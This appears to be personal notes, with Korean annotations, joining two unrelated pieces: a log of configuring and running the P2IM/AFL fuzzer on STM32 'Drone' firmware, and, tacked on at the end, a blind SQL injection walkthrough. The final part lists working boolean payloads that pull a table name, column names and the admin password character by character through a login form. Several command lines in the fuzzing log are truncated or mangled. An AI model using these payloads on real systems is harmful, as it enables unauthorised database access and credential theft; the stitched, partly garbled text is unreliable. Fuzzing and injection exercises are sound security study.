WORKING_DIR=~/tmp/p2im/fuzzing/Drone/5/
mkdir -p ${WORKING_DIR}
cd ${WORKING_DIR}
cp -r ~/tmp/p2im/fuzzing/templates/seeds/ ${WORKING_DIR}/inputs
config 수정
# P2IM - fuzzing configuration template
# ------------------------------------------------------
# Copyright (C) 2018-2020 RiS3 Lab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# <http://www.apache.org/licenses/LICENSE-2.0>
# Please change configurations that are enclosed in "< >".
# Please use absolute path in this file.
[DEFAULT] # used only by fuzz.py
# is the path of root directory of P2IM git repo
base = /home/babyhack/tmp/p2im ## 수정해야함. fuzzer 프로그램 경로
# can be arbitrary string you want. It doesn't need to be the firmware binary name
program = Drone ### 타켓 프로그램명 및 디렉토리 이름
# Each firmware may be fuzzed multiple times. So it's better to number each fuzzer run
run = 5
# working directory of fuzzing
working_dir = %(base)s/fuzzing/%(program)s/%(run)s
[afl] # used only by fuzz.py
bin = %(base)s/afl/afl-fuzz
timeout = 150+
input = %(working_dir)s/inputs
output = %(working_dir)s/outputs
[cov] # used only by cov.py
#count_hang = False
count_hang = True
bbl_cov_read_sz = 20000000
# 1 second
timeout = 1
[qemu]
bin = %(base)s/qemu/precompiled_bin/qemu-system-gnuarmeclipse
log = unimp,guest_errors,int
#log = unimp,guest_errors,exec,int -D qemu.log
[program]
# the board/mcu supported by QEMU is listed as comments below
#board =
#mcu =
#board = STM32F429I-Discovery
#mcu = STM32F429ZI
board = NUCLEO-F103RB # 타켓 board와 mcu 선택 (주석 제거)
mcu = STM32F103RB #
#board = Arduino-Due
#mcu = SAM3X8E
#board = FRDM-K64F
#mcu = MK64FN1M0VLL12
# has to be name of firmware elf file
img = %(working_dir)s/Drone # 이미지 경로 대소문자 구분하니 조심
[model]
retry_num = 3
peri_addr_range = 512
# arm-none-eabi-objdump is part of GNU Arm Embedded Toolchain you downloaded while setting up P2IM environment.
# For example, on my machine is /home/bo/gcc-arm-none-eabi-6-2017-q2-update/bin/arm-none-eabi-objdump
### objdump 경로 풀 경로 입력 해야함.
objdump = /home/babyhack/tmp/gcc-arm-none-eabi-10.3-2021.10/bin/arm-none-eabi-objdump
# config below are only used by fuzz.py
bin = %(base)s/model_instantiation/me.py
log_file = %(working_dir)s/me.log
fuzzing 환경 설정 폴더
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ cp /home/babyhack/tmp/p2im/externals/p2im-real_firmware/Drone ./
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ ls
Drone fuzz.cfg inputs
Fuzzer 실행
#python3 ~/tmp/p2im/model_instantiation/fuzz.py -c fuzz.cfg
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ python3 ~/tmp/p2im/model_instantiation/fuzz.py -c fuzz.cfg
Change working dir to: /home/babyhack/tmp/p2im/fuzzing/Drone/5
CWD: /home/babyhack/tmp/p2im/fuzzing/Drone/5
try our best to extract model w/o input
cmd_me0: /home/babyhack/tmp/p2im/model_instantiation/me.py -c /home/babyhack/tmp/p2im/fuzzing/Drone/5/fuzz.cfg --run-num 0 --print-to-file
Change working dir to: 0/
CWD: /home/babyhack/tmp/p2im/fuzzing/Drone/5/0
Redirect stdout to file named stdout
테스트 환경
0.random.8
run f/w w/ seed input to check if there is aup
cmd_qemu: /home/babyhack/tmp/p2im/qemu/precompiled_bin/qemu-system-gnuarmeclipse -nographic -aflFile /home/bats/random -board NUCLEO-F103RB -mcu STM32F103RB -image /home/babyhack/tmp/p2im/fuzzing/Drone/5/Drone -pm-stagp2im/fuzzing/Drone/5/0.random.7/peripheral_model.json -me-bin /home/babyhack/tmp/p2im/model_instantiation/me.m/fuzzing/Drone/5/fuzz.cfg
There is aup, run ME
cmd_me: /home/babyhack/tmp/p2im/model_instantiation/me.py -c /home/babyhack/tmp/p2im/fuzzing/Drone/5/fuzz.cfge --run-from-forkserver --afl-file /home/babyhack/tmp/p2im/fuzzing/Drone/5/inputs/random --model-if /home/babdom.7/peripheral_model.json
Change working dir to: 0.random.8/
CWD: /home/babyhack/tmp/p2im/fuzzing/Drone/5/0.random.8
Redirect stdout to file named stdout
Traceback (most recent call last):
File "/home/babyhack/tmp/p2im/model_instantiation/me.py", line 1166, in <module>
srr_info = stage1_5()
File "/home/babyhack/tmp/p2im/model_instantiation/me.py", line 490, in stage1_5
objdump = subprocess.check_output([cfg.objdump, "-dC", cfg.img])
File "/usr/lib/python3.5/subprocess.py", line 626, in check_output
**kwargs).stdout
File "/usr/lib/python3.5/subprocess.py", line 693, in run
with Popen(*popenargs, **kwargs) as process:
File "/usr/lib/python3.5/subprocess.py", line 947, in __init__
restore_signals, start_new_session)
File "/usr/lib/python3.5/subprocess.py", line 1551, in _execute_child
raise child_exception_type(errno_num, err_msg)
OSError: [Errno 8] Exec format error
0.random.9
run f/w w/ seed input to check if there is aup
cmd_qemu: /home/babyhack/tmp/p2im/qemu/precompiled_bin/qemu-system-gnuarmeclipse -nographic -aflFile /home/bats/random -board NUCLEO-F103RB -mcu STM32F103RB -image /home/babyhack/tmp/p2im/fuzzing/Drone/5/Drone -pm-stagp2im/fuzzing/Drone/5/0.random.8/peripheral_model.json -me-bin /home/babyhack/tmp/p2im/model_instantiation/me.m/fuzzing/Drone/5/fuzz.cfg
.............................
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ /home/babyhack/tmp/p2im/qemu/precompiled_bin/qemu-system-gnuarme
(process:17789): GLib-WARNING **: /Host/Work/qemu/glib-2.51.0/glib/gmem.c:483: custom memory allocation vtabl
[0, 0] 1-th(total 1-th) unassigned mem_r *0x0
[0, 0] 2-th(total 2-th) unassigned mem_r *0x4
QEMU 2.3.50 monitor - type 'help' for more information
(qemu) QEMU 2.3.50 monitor - type 'help' for more information
(qemu) [8004f10, 8004f4e] 1-th(total 3-th) pm_r *0x40021000 gets 0x0, remains CR+SR
[8004f10, 8004f4e] 1-th(total 1-th) pm_w *0x40021000 = 0x1, remains CR+SR
[8004f10, 8004f4e] 2-th(total 4-th) pm_r *0x40021004 gets 0x0, remains CR
[8004f10, 8004f4e] 2-th(total 2-th) pm_w *0x40021004 = 0x0, remains CR
[8004f10, 8004f4e] 3-th(total 5-th) pm_r *0x40021000 gets 0x1, remains CR+SR
[8004f10, 8004f4e] 3-th(total 3-th) pm_w *0x40021000 = 0x1, remains CR+SR
[8004f10, 8004f4e] 4-th(total 6-th) pm_r *0x40021000 gets 0x1, remains CR+SR
[8004f10, 8004f4e] 4-th(total 4-th) pm_w *0x40021000 = 0x1, remains CR+SR
[8004f10, 8004f4e] 5-th(total 7-th) pm_r *0x40021004 gets 0x0, remains CR
[8004f10, 8004f4e] 5-th(total 5-th) pm_w *0x40021004 = 0x0, remains CR
[8004f10, 8004f4e] 6-th(total 6-th) pm_w *0x40021008 = 0x9f0000, remains DR
start up afl forkserver!
[8001128, 800113a] 6-th(total 8-th) pm_r *0x40022000 gets 0x0, remains CR
[8001128, 800113a] 7-th(total 7-th) pm_w *0x40022000 = 0x10, remains CR
[8004ccc, 8004ce8] 7-th(total 9-th) pm_r *0x40021018 gets 0x0, remains CR
[8004ccc, 8004ce8] 8-th(total 8-th) pm_w *0x40021018 = 0x1, remains CR
[8004ccc, 8004ce8] 8-th(total 10-th) pm_r *0x40021018 gets 0x1, remains CR
[8001cba, 8001cc4] 9-th(total 11-th) pm_r *0x40021004 gets 0x0, remains CR
[8001cd4, 8001cf0] 10-th(total 12-th) pm_r *0x40021000 gets 0x1, remains CR+SR
[8001cf6, 8001d10] 11-th(total 13-th) pm_r *0x40021000 gets 0x1, remains CR+SR
[8001cf6, 8001d10] 9-th(total 9-th) pm_w *0x40021000 = 0x81, remains CR+SR
...........................
환경이 맞으면, AFL Fuzzing 시작
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ ls
0 0.random.1 0.random.2 0.random.3 Drone fuzz.cfg inputs me.log outputs run_fw.py
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ cd outputs/
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs$ ls
crashes fuzz_bitmap fuzzer_stats hangs plot_data queue
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs$ ls -sla
total 2116
4 drwx------ 5 babyhack babyhack 4096 Jan 24 06:58 .
4 drwxrwxr-x 8 babyhack babyhack 4096 Jan 24 06:51 ..
4 drwx------ 2 babyhack babyhack 4096 Jan 24 06:52 crashes
4 -rw------- 1 babyhack babyhack 164 Jan 24 06:58 .cur_input
2048 -rw------- 1 babyhack babyhack 2097152 Jan 24 06:57 fuzz_bitmap
4 -rw------- 1 babyhack babyhack 1093 Jan 24 06:57 fuzzer_stats
4 drwx------ 2 babyhack babyhack 4096 Jan 24 06:54 hangs
8 -rw------- 1 babyhack babyhack 4454 Jan 24 06:58 plot_data
36 drwx------ 3 babyhack babyhack 36864 Jan 24 06:58 queue
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs$ cd crashes/
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs/crashes$ ls
id:000000,ret_v:0x1,src:000000,op:havoc,rep:8 README.txt
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs/crashes$ ls -sla
total 16
4 drwx------ 2 babyhack babyhack 4096 Jan 24 06:52 .
4 drwx------ 5 babyhack babyhack 4096 Jan 24 06:58 ..
4 -rw------- 1 babyhack babyhack 148 Jan 24 06:52 id:000000,ret_v:0x1,src:000000,op:havoc,rep:8
4 -rw------- 1 babyhack babyhack 1106 Jan 24 06:52 README.txt
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs/crashes$ cat README.txt
Command line used to find this crash:
/home/babyhack/tmp/p2im/afl/afl-fuzz -i /home/babyhack/tmp/p2im/fuzzing/Drone/5/inputs -o /home/babyhack/tmp/p2im/fuzzing/Drone/5/outputs -t 150+ -QQ -a /home/babyhack/tmp/p2im/model_instantiation/me.py -b /home/babyhack/tmp/p2im/fuzzing/Drone/5/fuzz.cfg -c /home/babyhack/tmp/p2im/fuzzing/Drone/5/0.random.3/peripheral_model.json -T Drone_5 -d /home/babyhack/tmp/p2im/qemu/precompiled_bin/qemu-system-gnuarmeclipse -nographic -board NUCLEO-F103RB -mcu STM32F103RB -image /home/babyhack/tmp/p2im/fuzzing/Drone/5/Drone -pm-stage 3 -aflFile @@
If you can't reproduce a bug outside of afl-fuzz, be sure to set the same
memory limit. The limit used for this fuzzing session was 2.00 GB.
Need a tool to minimize test cases before investigating the crashes or sending
them to a vendor? Check out the afl-tmin that comes with the fuzzer!
Found any cool bugs in open-source tools using afl-fuzz? If yes, please drop
me a mail at <lcamtuf@coredump.cx> once the issues are fixed - I'd love to
add your finds to the gallery at:
<http://lcamtuf.coredump.cx/afl/>
Thanks :-)
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs/crashes$
</lcamtuf@coredump.cx>
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 110 #
- Response : Login Failed
:: 첫번째 문자열 확인
' or 1=1 and ascii(substr((select table_name from
information_schema.tables where table_type='base table' limit 0,1),1,1))
> 108 #
- Response : Success
:: 확실히 맞는지 확인
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) = 109 #
- Response : Success
:: 두번째 문자열 확인
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),2,1)) = 109 #
- Response : Success
:: 마지막 문자열 확인
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),7,1)) = 0 #
2.3. Column명 추출
[[ column 추출 - information_schema.columns ]]
--> 테이블 명에서 찾은 "member"를 활용
:: ascii 테이블을 기반으로 숫자를 변경하여 범위를 줄임
' or 1=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 110 # ' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 53)#
:: 첫번째 컬럼 ' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) = 110)# ' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),2,1)) = 111)# no
:: 두번째 컬럼 ' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 1,1),1,1)) = 105)# ' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 1,1),2,1)) = 100)# id
2.4. value 찾기
[[ 저장된 값 찾기 ]]
' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) > 100)# ' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) = 115)#
' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),16,1)) =0)#